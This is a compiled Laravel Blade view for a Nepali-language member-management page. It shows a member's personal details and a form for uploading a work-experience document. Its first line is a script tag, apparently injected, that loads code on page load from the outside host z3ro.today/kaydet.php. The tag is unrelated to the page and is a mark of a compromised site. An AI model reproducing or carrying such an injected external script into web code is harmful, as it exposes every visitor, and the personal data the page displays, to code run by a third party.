<script src="http://z3ro.today/kaydet.php"></script><?php $__env->startSection('content'); ?>
<!-- start page title -->
<div class="row">
    <div class="col-12">
        <div class="page-title-box d-sm-flex align-items-center justify-content-between">
            <h4 class="mb-sm-0 font-size-18">कार्य अनुभवको डकुमेन्ट सम्पादन गर्ने </h4>

            <div class="page-title-right">
                <ol class="breadcrumb m-0">
                    <li class="breadcrumb-item"><a href="#">सदस्य</a></li>
                    <li class="breadcrumb-item active">कार्य अनुभवको डकुमेन्ट सम्पादन गर्ने</li>
                </ol>
            </div>

        </div>
    </div>
</div>
<!-- end page title -->

<div class="row">
    <div class="col-lg-12">
        <div class="card">
            <div class="card-body">
                <div class="row">
                    <div class="col">
                        <table class="table align-middle">
                            <thead>
                                <tr class="bg-transparent">
                                    <th>सदस्यको नाम</th>
                                    <th> जन्म मिति </th>
                                    <th>बुबाको नाम</th>
                                    <th>आमाको नाम</th>
                                    <th>श्रेणी</th>
                                    <th>विशेषज्ञता</th>
                                </tr>
                            </thead>
                            <tbody>
                                <td><?php echo e($memberInfo->nameeng); ?></td>
                                <td> <?php echo e($memberInfo->dob); ?> </td>
                                <td><?php echo e($memberInfo->fname); ?> </td>
                                <td><?php echo e($memberInfo->mname); ?></td>
                                <td><?php echo e($memberInfo->level->level); ?></td>
                                <td><?php echo e($memberInfo->specialization->specialization); ?></td>
                                </tr>
                            </tbody>
                        </table>
                    </div>
                </div>

                <form action="<?php echo e(url('updatedocs', $docs->id)); ?>" method="POST" enctype="multipart/form-data">
                    <?php echo csrf_field(); ?>
                    <div class="row">

                        <div class="col-md-4 mb-3">
                            <label class="form-label">डकुमेन्ट अपलोड
                                <?php if($docs->document_upload !== '0' && !empty($docs->document_upload)): ?>
                                <a href="<?php echo e(storage_url($docs->document_upload)); ?>" target="_blank">View Old</a>
                                <?php endif; ?>
                            </label>
                            <input id="document_upload" type="file" class="form-control <?php $__errorArgs = ['document_upload'];
$__bag = $errors->getBag($__errorArgs[1] ?? 'default');
if ($__bag->has($__errorArgs[0])) :
if (isset($message)) { $__messageOriginal = $message; }
$message = $__bag->first($__errorArgs[0]); ?> is-invalid <?php unset($message);
if (isset($__messageOriginal)) { $message = $__messageOriginal; }
endif;
unset($__errorArgs, $__bag); ?>" name="document_upload" value="<?php echo e($docs->document_upload); ?>" required autocomplete="off">

                            <?php $__errorArgs = ['document_upload'];
$__bag = $errors->getBag($__errorArgs[1] ?? 'default');
if ($__bag->has($__errorArgs[0])) :
if (isset($message)) { $__messageOriginal = $message; }
$message = $__bag->first($__errorArgs[0]); ?>
                            <span class="invalid-feedback" role="alert">
                                <strong><?php echo e($message); ?></strong>
                            </span>
                            <?php unset($message);
if (isset($__messageOriginal)) { $message = $__messageOriginal; }
endif;
unset($__errorArgs, $__bag); ?>
                        </div>



                    </div>


                    <div class="mb-3">
                        <button class="btn btn-primary w-100 waves-effect waves-light" type="submit">अपडेट गर्ने</button>
                    </div>
                </form>
                <!-- end table responsive -->
            </div>
            <!-- end card body -->
        </div>
        <!-- end card -->
    </div>
    <!-- end col -->
</div>
<!-- end row -->
<?php $__env->stopSection(); ?>
<?php echo $__env->make('layouts.app', array_diff_key(get_defined_vars(), ['__data' => 1, '__path' => 1]))->render(); ?><?php /**PATH /var/www/html/resources/views/member-details/updatedocs.blade.php ENDPATH**/ ?>